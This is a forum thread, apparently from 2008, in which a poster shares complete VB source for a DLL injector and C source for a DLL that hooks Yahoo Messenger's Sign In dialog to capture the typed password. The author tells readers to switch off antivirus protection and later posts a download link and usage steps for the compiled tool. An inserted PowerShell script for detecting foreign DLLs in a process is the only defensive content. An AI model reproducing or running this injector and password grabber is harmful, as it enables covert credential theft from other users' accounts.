vladiii Posted January 4, 2008

I made a small program that injects a DLL into Yahoo Messenger. Basically, I intercept the messages Windows sends to the Sign In button... When I receive a WM_COMMAND message (with BN_CLICKED), I grab the password from the Password field and display it in a message box. The injector is written in VB and the DLL in C [that's because VB sux and I didn't manage to write a DLL that executes something when injected into the YahooMessenger process]. I'll present the source code here. [The VB injector is like any other DLL injector and nothing special... The thing is that I couldn't find a DLL injector written in VB anywhere on the net, so I wrote it myself (obviously, with help from injectors written in other programming languages)]. In this injector I also left some MsgBoxes that display the values of the handles. If any handle is 0, run the injection again (it may not inject the DLL on the first try). Besides that, your AV may warn you, but that's no problem, disable Proactive Defense (in Kaspersky...).

Let's see the injector code (in the module):

[code]
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function IsWindow Lib "user32" (ByVal hwnd As Long) As Long

Public Const PAGE_READWRITE As Long = &H4
Public Const MEM_COMMIT As Long = &H1000
Public Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Public Const SYNCHRONIZE As Long = &H100000
Public Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
' INFINITE is 0xFFFFFFFF (-1 as a VB Long); &HFFFFFF would be a finite ~4.6 h timeout
Public Const INFINITE As Long = &HFFFFFFFF

Public Sub injectdll(ByVal procid As Long, ByVal inject As String)
    Dim hProcess As Long
    Dim lpRemoteAddress As Long
    Dim inj As Long
    Dim k32 As Long
    Dim dwtid As Long
    Dim asd As Long
    Dim dwBytesWritten As Long
    Dim hRemoteThread As Long

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, procid)
    If (hProcess = 0) Then
        MsgBox "An error occurred!"
        Exit Sub
    End If
    ' kernel32 is mapped at the same base in every process, so the address of
    ' LoadLibraryA resolved here is also valid inside the target process
    asd = GetModuleHandle("kernel32.dll")
    k32 = GetProcAddress(asd, "LoadLibraryA")
    ' Reserve room in the target for the DLL path plus its null terminator
    lpRemoteAddress = VirtualAllocEx(hProcess, 0, Len(inject) + 1, MEM_COMMIT, PAGE_READWRITE)
    MsgBox lpRemoteAddress
    ' A String passed ByVal to an "As Any" parameter is converted to ANSI, so the
    ' buffer actually written is Len + 1 bytes (LenB would read past it)
    inj = WriteProcessMemory(hProcess, ByVal lpRemoteAddress, ByVal inject, Len(inject) + 1, dwBytesWritten)
    MsgBox inj
    If (inj <> 0) Then
        ' The remote thread starts at LoadLibraryA with the path as its argument.
        ' lpThreadAttributes must be a NULL pointer (ByVal 0&), not a pointer to 0.
        hRemoteThread = CreateRemoteThread(hProcess, ByVal 0&, 0, ByVal k32, ByVal lpRemoteAddress, 0, dwtid)
        MsgBox hRemoteThread
        If (hRemoteThread <> 0) Then
            WaitForSingleObject hRemoteThread, INFINITE
            CloseHandle hRemoteThread
        End If
    End If
    CloseHandle hProcess
End Sub
[/code]

And on a button inside the form:

[code]
Private Sub Command1_Click()
    Dim pid As Long
    Dim handle As Long
    handle = FindWindow("YahooBuddyMain", vbNullString)
    If (handle = 0) Then
        MsgBox "Yahoo Messenger window not found!"
        Exit Sub
    End If
    ' Find the PID of the process
    Call GetWindowThreadProcessId(handle, pid)
    ' Call the function that injects the DLL
    Call injectdll(pid, "C:\Project1.dll")
End Sub
[/code]

And now the DLL, written in C and compiled in Dev-C++ [obviously, it's a DLL-type project]. I wrote the code in dllmain.c, and Dev created a file for me, dll.h! Let's see the code:

[code]
/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI Main(LPVOID lpParam);
LRESULT CALLBACK NewWndProc(HWND, UINT, WPARAM, LPARAM);
LONG OldWndProc; /* YahooMessenger's original window procedure */

BOOL APIENTRY DllMain(HINSTANCE hInst  /* Library instance handle. */,
                      DWORD reason     /* Reason this function is being called. */,
                      LPVOID reserved  /* Not used. */)
{
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        /* Create a new thread in which our code will run */
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Main, NULL, 0, NULL);
        break; /* the original fell through into the next case */
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    /* Returns TRUE on success, FALSE on failure */
    return TRUE;
}

DWORD WINAPI Main(LPVOID lpParam)
{
    HWND hand1 = FindWindow("YahooBuddyMain", NULL);
    HWND hand2 = FindWindowEx(hand1, 0, "#32770", NULL);
    /* The Sign In button is a child of the window with handle hand2,
       so we subclass that dialog and see its WM_COMMAND notifications */
    OldWndProc = SetWindowLong(hand2, GWL_WNDPROC, (LONG)NewWndProc);
    return 0;
}

LRESULT CALLBACK NewWndProc(HWND hWnd, UINT Message, WPARAM wParam, LPARAM lParam)
{
    switch (Message)
    {
    case WM_COMMAND:
    {
        /* If the Sign In button was "clicked" then... */
        if (HIWORD(wParam) == BN_CLICKED && LOWORD(wParam) == 1)
        {
            char *pass;
            long len;
            HWND hwnd, hwnd2;
            hwnd = FindWindow("YahooBuddyMain", 0);
            hwnd = FindWindowEx(hwnd, 0, "#32770", NULL);
            hwnd2 = FindWindowEx(hwnd, 0, "Edit", NULL);     /* first Edit: the ID field */
            hwnd = FindWindowEx(hwnd, hwnd2, "Edit", NULL);  /* second Edit: the Password field */
            len = SendMessage(hwnd, WM_GETTEXTLENGTH, 0, 0);
            len += 1;                                        /* room for the null terminator */
            pass = (char *)malloc(len);
            if (pass != NULL)
            {
                SendMessage(hwnd, WM_GETTEXT, len, (LPARAM)pass);
                /* Display it */
                MessageBox(0, pass, pass, 0);
                free(pass);                                  /* the original leaked this buffer */
            }
        }
        break;
    }
    }
    /* Forward the messages to where they were actually supposed to go */
    return CallWindowProc((WNDPROC)OldWndProc, hWnd, Message, wParam, lParam);
}
[/code]

That's about it. I hope it will be useful to someone/someday!

P.S. Thanks to SlicK for all the help [you're the man].
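A defender-side check for the technique in the post above, added here as an example and not part of the original thread: it lists the modules loaded into a running process and reports any that live outside the Windows and Program Files directories or lack a valid Authenticode signature, which is how a DLL loaded from C:\ via LoadLibraryA would stand out among the modules of the messenger process. The process image name is an assumption and is passed in as a parameter.

```powershell
# Added example (not from the original post): report modules that look
# foreign to a running process, e.g. a DLL loaded from C:\ by LoadLibraryA.
param(
    [Parameter(Mandatory = $true)]
    [string]$ProcessName   # assumption: image name of the process to inspect
)

# Directories where a legitimately installed module is expected to live.
$trusted = @(
    $env:SystemRoot,
    ${env:ProgramFiles},
    ${env:ProgramFiles(x86)}
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Test-TrustedPath {
    param([string]$Path)
    foreach ($dir in $trusted) {
        if ($Path.StartsWith($dir, [System.StringComparison]::OrdinalIgnoreCase)) {
            return $true
        }
    }
    return $false
}

$procs = Get-Process -Name $ProcessName -ErrorAction Stop
foreach ($p in $procs) {
    # .Modules requires a PowerShell of the same bitness as the target;
    # reading a 32-bit process from 64-bit PowerShell throws here.
    try { $modules = $p.Modules }
    catch { Write-Warning "Cannot read modules of PID $($p.Id): $_"; continue }

    foreach ($m in $modules) {
        $path      = $m.FileName
        $sig       = Get-AuthenticodeSignature -FilePath $path
        $inTrusted = Test-TrustedPath $path
        # Either condition alone is enough to surface the module for review.
        if (-not $inTrusted -or $sig.Status -ne 'Valid') {
            [pscustomobject]@{
                PID       = $p.Id
                Module    = $m.ModuleName
                Path      = $path
                InTrusted = $inTrusted
                Signature = $sig.Status
            }
        }
    }
}
```

Unsigned but legitimate third-party DLLs will also be listed, so the path column is the stronger signal; a module sitting directly in C:\ as in the post is the case this is meant to catch.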
kw3rln Posted January 5, 2008

well done! http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=60
EsKaBaR Posted February 1, 2008

ehh, the DLL would be helpful to me... ... http://rstcenter.com/forum/am-uitat-parola-la-id-personal-pe-care-sunt-logat-si-acum-t9954.rst I don't know what to do to recover it.... I don't want to part with this ID... and make another one... I'm online because I left remember id and password on, but if my Windows breaks... I'm screwed... please help me too... I'll owe you one. vladiii, can you help me? give me some support on mess too because I'm not good at this..... ... I'd really be grateful...
vladiii (Author) Posted February 2, 2008

^ I've uploaded both the injector and the DLL here: [url]http://rapidshare.com/files/88602000/RetriveY_Pass.rar.html[/url]

Save Project1.dll in C:\, log out of Messenger, run injecter.exe, then click Sign In and it will display a msgbox with the password. However, if your password had more than 8 characters, that field will contain: "password". In that case there's nothing more you can do, because the password decryption algorithm is not known. Good luck!
shamat Posted February 2, 2008

I tried the program on an account with the password 123456. I get 3 MsgBoxes. The first shows an 8-digit number (not my password), the second shows the number 1, and the third 92 or 88.
vladiii (Author) Posted February 2, 2008

Did you look at the source code? Apparently NOT!

1) Those 3 MsgBoxes are there to confirm that the DLL was injected. If the value in any MsgBox is 0, then the DLL was not injected and you have to press Inject once more.

2) The MessageBox with your password will be displayed when you click Sign In, because I subclass that button.
shamat Posted February 2, 2008

Now I got it working. The program works fine. You said that if my password has more than 8 characters, the password field will contain the word "Password". Even if your password is shorter than 8 characters, that field will still contain the word "Password". When I inject and click Sign In it shows me "Password" and not my password. Correct me if I'm wrong.
vladiii (Author) Posted February 2, 2008

You're not wrong. I tested 5 minutes ago and no matter what password you enter, if you tick Remember ID & Password, what stays in there is still "password".